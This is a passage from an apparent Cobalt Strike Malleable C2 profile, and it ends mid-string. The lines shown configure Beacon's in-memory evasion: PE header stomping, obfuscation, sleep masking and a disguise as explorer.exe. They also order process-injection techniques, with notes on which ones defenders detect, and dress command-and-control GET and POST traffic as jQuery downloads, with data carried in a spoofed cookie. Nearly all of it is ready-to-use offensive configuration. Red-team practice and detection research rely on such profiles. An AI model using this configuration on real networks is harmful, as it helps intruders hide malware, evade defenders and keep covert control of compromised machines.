320 | ## obfuscate false Obfuscate the Reflective DLL's import table, overwrite unused header content, and ask ReflectiveLoader to copy Beacon to new memory without its DLL headers. As of 4.2 CS now obfuscates .text section in rDLL package | |
321 | ## rich_header N/A Meta-information inserted by the compiler | |
322 | ## sleep_mask false CS 3.12 - Obfuscate Beacon (HTTP, SMB, TCP Beacons), in-memory, prior to sleeping (HTTP) or waiting for a new connection\data (SMB\TCP) | |
323 | ## smartinject false CS 4.1 added to stage block - Use embedded function pointer hints to bootstrap Beacon agent without walking kernel32 EAT | |
324 | ## stomppe true Ask ReflectiveLoader to stomp MZ, PE, and e_lfanew values after it loads Beacon payload | |
325 | ## userwx false Ask ReflectiveLoader to use or avoid RWX permissions for Beacon DLL in memory | |
326 | ## Guidelines: | |
327 | ## - Modify the indicators to minimize in memory indicators | |
328 | # - Refer to | |
329 | ## https://blog.cobaltstrike.com/2018/02/08/in-memory-evasion/ | |
330 | ## https://www.youtube.com/playlist?list=PL9HO6M_MU2nc5Q31qd2CwpZ8J4KFMhgnK | |
331 | ## https://www.youtube.com/watch?v=AV4XjxYe4GM (Obfuscate and Sleep) | |
332 | stage { | |
333 | ||
334 | # CS 4.2 added allocator and MZ header overrides | |
335 | set allocator "VirtualAlloc"; # Options are: HeapAlloc, MapViewOfFile, and VirtualAlloc | |
336 | #set magic_mz_x86 "MZRE"; | |
337 | #set magic_mz_x64 "MZAR"; | |
338 | set magic_pe "NO"; | |
339 | set userwx "false"; | |
340 | set stomppe "true"; | |
341 | set obfuscate "true"; | |
342 | set cleanup "true"; | |
343 | # CS 3.12 Addition "Obfuscate and Sleep" | |
344 | set sleep_mask "true"; | |
345 | # CS 4.1 | |
346 | set smartinject "true"; | |
347 | ||
348 | # Make the Beacon Reflective DLL look like something else in memory | |
349 | # Values captured using peclone agaist a Windows 10 version of explorer.exe | |
350 | set checksum "0"; | |
351 | set compile_time "11 Nov 2016 04:08:32"; | |
352 | set entry_point "650688"; | |
353 | set image_size_x86 "4661248"; | |
354 | set image_size_x64 "4661248"; | |
355 | set name "srv.dll"; | |
356 | set rich_header "\x3e\x98\xfe\x75\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x73\x81\x03\x26\xfc\xf9\x90\x26\x17\xa4\x93\x27\x79\xf9\x90\x26\x7a\xf9\x91\x26\x83\xfd\x90\x26\x17\xa4\x91\x27\x65\xf9\x90\x26\x17\xa4\x95\x27\x77\xf9\x90\x26\x17\xa4\x94\x27\x6c\xf9\x90\x26\x17\xa4\x9e\x27\x56\xf8\x90\x26\x17\xa4\x6f\x26\x7b\xf9\x90\x26\x17\xa4\x92\x27\x7b\xf9\x90\x26\x52\x69\x63\x68\x7a\xf9\x90\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; | |
357 | ||
358 | ## WARNING: Module stomping | |
359 | # Cobalt Strike 3.11 also adds module stomping to Beacon's Reflective Loader. When enabled, Beacon's loader will shun VirtualAlloc and instead load a DLL into the current process and overwrite its memory. | |
360 | # Set module_x86 to a favorite x86 DLL to module stomp with the x86 Beacon. The module_x64 option enables this for the x64 Beacon. | |
361 | # While this is a powerful feature, caveats apply! If the library you load is not large enough to host Beacon, you will crash Beacon's process. If the current process loads the same library later (for whatever reason), you will crash Beacon's process. Choose carefully. | |
362 | # By default, Beacon's loader allocates memory with VirtualAlloc. Module stomping is an alternative to this. Set module_x86 to a DLL that is about twice as large as the Beacon payload itself. Beacon's x86 loader will load the specified DLL, find its location in memory, and overwrite it. This is a way to situate Beacon in memory that Windows associates with a file on disk. It's important that the DLL you choose is not needed by the applications you intend to reside in. The module_x64 option is the same story, but it affects the x64 Beacon. | |
363 | # Details can be found in the In-memory Evasion video series. https://youtu.be/uWVH9l2GMw4 | |
364 | ||
365 | # set module_x64 "netshell.dll"; | |
366 | # set module_x86 "netshell.dll"; | |
367 | ||
368 | # The transform-x86 and transform-x64 blocks pad and transform Beacon's Reflective DLL stage. These blocks support three commands: prepend, append, and strrep. | |
369 | transform-x86 { # transform the x86 rDLL stage | |
370 | prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops | |
371 | strrep "ReflectiveLoader" "execute"; # Change this text | |
372 | strrep "This program cannot be run in DOS mode" ""; # Remove this text | |
373 | strrep "beacon.dll" ""; # Remove this text | |
374 | } | |
375 | transform-x64 { # transform the x64 rDLL stage | |
376 | prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops | |
377 | strrep "ReflectiveLoader" "execute"; # Change this text in the Beacon DLL | |
378 | strrep "beacon.x64.dll" ""; # Remove this text in the Beacon DLL | |
379 | } | |
380 | ||
381 | stringw "jQuery"; # Add this string to the DLL | |
382 | } | |
383 | ||
384 | ################################################ | |
385 | ## Process Injection | |
386 | ################################################ | |
387 | ## Description: | |
388 | ## The process-inject block in Malleable C2 profiles shapes injected content and controls process injection behavior. | |
389 | ## Values: | |
390 | ## allocator VirtualAllocEx The preferred method to allocate memory in the remote process. Specify VirtualAllocEx or NtMapViewOfSection. The NtMapViewOfSection option is for same-architecture injection only. VirtualAllocEx is always used for cross-arch memory allocations. | |
391 | ## min_alloc 4096 Minimum amount of memory to request for injected content. | |
392 | ## startrwx false Use RWX as initial permissions for injected content. Alternative is RW. | |
393 | ## userwx false Use RWX as final permissions for injected content. Alternative is RX. | |
394 | ## | |
395 | ## | |
396 | ## Use the transform-x86\x64 to pad content injected by Beacon | |
397 | ## Use the execute block to control use of Beacon's process injection techniques | |
398 | ## Guidelines: | |
399 | ## - Modify the indicators to minimize in memory indicators | |
400 | # - Refer to | |
401 | ## https://www.cobaltstrike.com/help-malleable-c2#processinject | |
402 | ## https://blog.cobaltstrike.com/2019/08/21/cobalt-strikes-process-injection-the-details/ | |
403 | ||
404 | process-inject { | |
405 | ||
406 | # set a remote memory allocation technique: VirtualAllocEx|NtMapViewOfSection | |
407 | set allocator "NtMapViewOfSection"; | |
408 | ||
409 | # Minimium memory allocation size when injecting content | |
410 | set min_alloc "17500"; | |
411 | ||
412 | # Set memory permissions as permissions as initial=RWX, final=RX | |
413 | set startrwx "false"; | |
414 | set userwx "false"; | |
415 | ||
416 | # Transform injected content to avoid signature detection of first few bytes. Only supports prepend and append. | |
417 | transform-x86 { | |
418 | prepend "\x90\x90"; | |
419 | #append "\x90\x90"; | |
420 | } | |
421 | ||
422 | transform-x64 { | |
423 | prepend "\x90\x90"; | |
424 | #append "\x90\x90"; | |
425 | } | |
426 | ||
427 | ## The execute block controls the methods Beacon will use when it needs to inject code into a process. Beacon examines each option in the execute block, determines if the option is usable for the current context, tries the method when it is usable, and moves on to the next option if code execution did not happen. The execute options include: | |
428 | # | |
429 | # Name x86->x64 x64-x86 Notes | |
430 | ######################################################################### | |
431 | # CreateThread Current Process only | |
432 | # CreateRemoteThread Yes No cross-session | |
433 | # NtQueueApcThread | |
434 | # NtQueAPCThread-s This is the "Early Bird" injection technique. Suspended processes (e.g., post-ex jobs) only. | |
435 | # RtlCreateUserThread Yes Yes Risky on XP-era targets; uses RWX shellcode for x86->x64 injection. | |
436 | # SetThreadContext Yes Suspended processes (e.g. post-ex jobs only) | |
437 | execute { | |
438 | ||
439 | # The order is important! Each step will be attempted (if applicable) until successful | |
440 | ## self-injection | |
441 | CreateThread "ntdll!RtlUserThreadStart+0x42"; | |
442 | CreateThread; | |
443 | ||
444 | ## Injection via suspened processes (SetThreadContext|NtQueueApcThread-s) | |
445 | # OPSEC - when you use SetThreadContext; your thread will have a start address that reflects the original execution entry point of the temporary process. | |
446 | # SetThreadContext; | |
447 | NtQueueApcThread-s; | |
448 | ||
449 | ## Injection into existing processes | |
450 | # OPSEC Uses RWX stub - Detected by Get-InjectedThread. Less detected by some defensive products. | |
451 | #NtQueueApcThread; | |
452 | ||
453 | # CreateRemotThread - Vanilla cross process injection technique. Doesn't cross session boundaries | |
454 | # OPSEC - fires Sysmon Event 8 | |
455 | CreateRemoteThread; | |
456 | ||
457 | # RtlCreateUserThread - Supports all architecture dependent corner cases (e.g., 32bit -> 64bit injection) AND injection across session boundaries | |
458 | # OPSEC - fires Sysmon Event 8. Uses Meterpreter implementation and RWX stub - Detected by Get-InjectedThread | |
459 | RtlCreateUserThread; | |
460 | } | |
461 | } | |
462 | ################################################ | |
463 | ## Maleable C2 | |
464 | ## https://www.cobaltstrike.com/help-malleable-c2#options | |
465 | ################################################ | |
466 | ## HTTP Headers | |
467 | ################################################ | |
468 | ## Description: | |
469 | ## The http-config block has influence over all HTTP responses served by Cobalt Strike’s web server. Here, you may specify additional HTTP headers and the HTTP header order. | |
470 | ## Values: | |
471 | ## set headers "Comma separated list of headers" The set headers option specifies the order these HTTP headers are delivered in an HTTP response. Any headers not in this list are added to the end. | |
472 | ## header "headername" "header alue The header keyword adds a header value to each of Cobalt Strike's HTTP responses. If the header value is already defined in a response, this value is ignored. | |
473 | ## set trust_x_forwarded_for "true" Adds this header to determine remote address of a request. | |
474 | ## Guidelines: | |
475 | ## - Use this section in addition to the "server" secion in http-get and http-post to further define the HTTP headers | |
476 | ||
477 | http-config { | |
478 | set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type"; | |
479 | header "Server" "Apache"; | |
480 | header "Keep-Alive" "timeout=10, max=100"; | |
481 | header "Connection" "Keep-Alive"; | |
482 | # Use this option if your teamserver is behind a redirector | |
483 | set trust_x_forwarded_for "true"; | |
484 | } | |
485 | ||
486 | ################################################ | |
487 | ## HTTP GET | |
488 | ################################################ | |
489 | ## Description: | |
490 | ## GET is used to poll teamserver for tasks | |
491 | ## Defaults: | |
492 | ## uri "/activity" | |
493 | ## Headers (Sample) | |
494 | ## Accept: */* | |
495 | ## Cookie: CN7uVizbjdUdzNShKoHQc1HdhBsB0XMCbWJGIRF27eYLDqc9Tnb220an8ZgFcFMXLARTWEGgsvWsAYe+bsf67HyISXgvTUpVJRSZeRYkhOTgr31/5xHiittfuu1QwcKdXopIE+yP8QmpyRq3DgsRB45PFEGcidrQn3/aK0MnXoM= | |
496 | ## User-Agent Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1) | |
497 | ## Guidelines: | |
498 | ## - Add customize HTTP headers to the HTTP traffic of your campaign | |
499 | ## - Analyze sample HTTP traffic to use as a reference | |
500 | ## - Multiple URIs can be added. Beacon will randomly pick from these. | |
501 | ## - Use spaces as a URI seperator | |
502 | http-get { | |
503 | ||
504 | set uri "/jquery-3.3.1.min.js"; | |
505 | set verb "GET"; | |
506 | ||
507 | client { | |
508 | ||
509 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; | |
510 | #header "Host" "code.jquery.com"; | |
511 | header "Referer" "http://code.jquery.com/"; | |
512 | header "Accept-Encoding" "gzip, deflate"; | |
513 | ||
514 | metadata { | |
515 | base64url; | |
516 | prepend "__cfduid="; | |
517 | header "Cookie"; | |
518 | } | |
519 | } | |
520 | ||
521 | server { | |
522 | ||
523 | header "Server" "NetDNA-cache/2.2"; | |
524 | header "Cache-Control" "max-age=0, no-cache"; | |
525 | header "Pragma" "no-cache"; | |
526 | header "Connection" "keep-alive"; | |
527 | header "Content-Type" "application/javascript; charset=utf-8"; | |
528 | ||
529 | output { | |
530 | mask; | |
531 | base64url; | |
532 | ## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values) | |
533 | # 2nd Line | |
534 | prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r"; | |
535 | # 1st Line | |
536 | prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */"; | |
537 | append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"; | |
538 | print; | |
539 | } | |
540 | } | |
541 | } | |
542 | ||
543 | ################################################ | |
544 | ## HTTP POST | |
545 | ################################################ | |
546 | ## Description: | |
547 | ## POST is used to send output to the teamserver | |
548 | ## Can use HTTP GET or POST to send data | |
549 | ## Note on using GET: Beacon will automatically chunk its responses (and use multiple requests) to fit the constraints of an HTTP GET-only channel. | |
550 | ## Defaults: | |
551 | ## uri "/activity" | |
552 | ## Headers (Sample) | |
553 | ## Accept: */* | |
554 | ## Cookie: CN7uVizbjdUdzNShKoHQc1HdhBsB0XMCbWJGIRF27eYLDqc9Tnb220an8ZgFcFMXLARTWEGgsvWsAYe+bsf67HyISXgvTUpVJRSZeRYkhOTgr31/5xHiittfuu1QwcKdXopIE+yP8QmpyRq3DgsRB45PFEGcidrQn3/aK0MnXoM= | |
555 | ## User-Agent Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1) | |
556 | ## Guidelines: | |
557 | ## - Decide if you want to use HTTP GET or HTTP POST requests for this section | |
558 | ## - Add customize HTTP headers to the HTTP traffic of your campaign | |
559 | ## - Analyze sample HTTP traffic to use as a reference | |
560 | ## Use HTTP POST for http-post section | |
561 | ## Uncomment this Section to activate | |
562 | http-post { | |
563 | ||
564 | set uri "/jquery-3.3.2.min.js"; | |
565 | set verb "POST"; | |
566 | ||
567 | client { | |
568 | ||
569 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; | |
570 | #header "Host" "code.jquery.com"; | |
571 | header "Referer" "http://code.jquery.com/"; | |
572 | header "Accept-Encoding" "gzip, deflate"; | |
573 | ||
574 | id { | |
575 | mask; | |
576 | base64url; | |
577 | parameter "__cfduid"; | |
578 | } | |
579 | ||
580 | output { | |
581 | mask; | |
582 | base64url; | |
583 | print; | |
584 | } | |
585 | } | |
586 | ||
587 | server { | |
588 | ||
589 | header "Server" "NetDNA-cache/2.2"; | |
590 | header "Cache-Control" "max-age=0, no-cache"; | |
591 | header "Pragma" "no-cache"; | |
592 | header "Connection" "keep-alive"; | |
593 | header "Content-Type" "application/javascript; charset=utf-8"; | |
594 | ||
595 | output { | |
596 | mask; | |
597 | base64url; | |
598 | ## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values) | |
599 | # 2nd Line | |
600 | prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r"; | |
601 | # 1st Line | |
602 | prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */"; | |
603 | append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"; | |
604 | print; | |
605 | } | |
606 | } | |
607 | } | |
608 | ||
609 | ## Use HTTP GET for http-post section | |
610 | ## Uncomment this Section to activate | |
611 | # http-post { | |
612 | ||
613 | # set uri "/jquery-3.3.2.min.js"; | |
614 | # set verb "GET"; | |
615 | ||
616 | # client { | |
617 | ||
618 | # header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; | |
619 | # #header "Host" "code.jquery.com"; | |
620 | # header "Referer" "http://code.jquery.com/"; | |
621 | # header "Accept-Encoding" "gzip, deflate"; | |
622 | ||
623 | # id { | |
624 | # mask; | |
625 | # base64url; | |
626 | # parameter "__cfduid"; | |
627 | # } | |
628 | ||
629 | # output { | |
630 | # mask; | |
631 | # base64url; | |
632 | # parameter "__tg"; | |
633 | # } | |
634 | # } | |
635 | ||
636 | # server { | |
637 | ||
638 | # header "Server" "NetDNA-cache/2.2"; | |
639 | # header "Cache-Control" "max-age=0, no-cache"; | |
640 | # header "Pragma" "no-cache"; | |
641 | # header "Connection" "keep-alive"; | |
642 | # header "Content-Type" "application/javascript; charset=utf-8"; | |
643 | ||
644 | # output { | |
645 | # mask; | |
646 | # base64url; | |
647 | # ## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values) | |
648 | # # 2nd Line | |
649 | # prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in 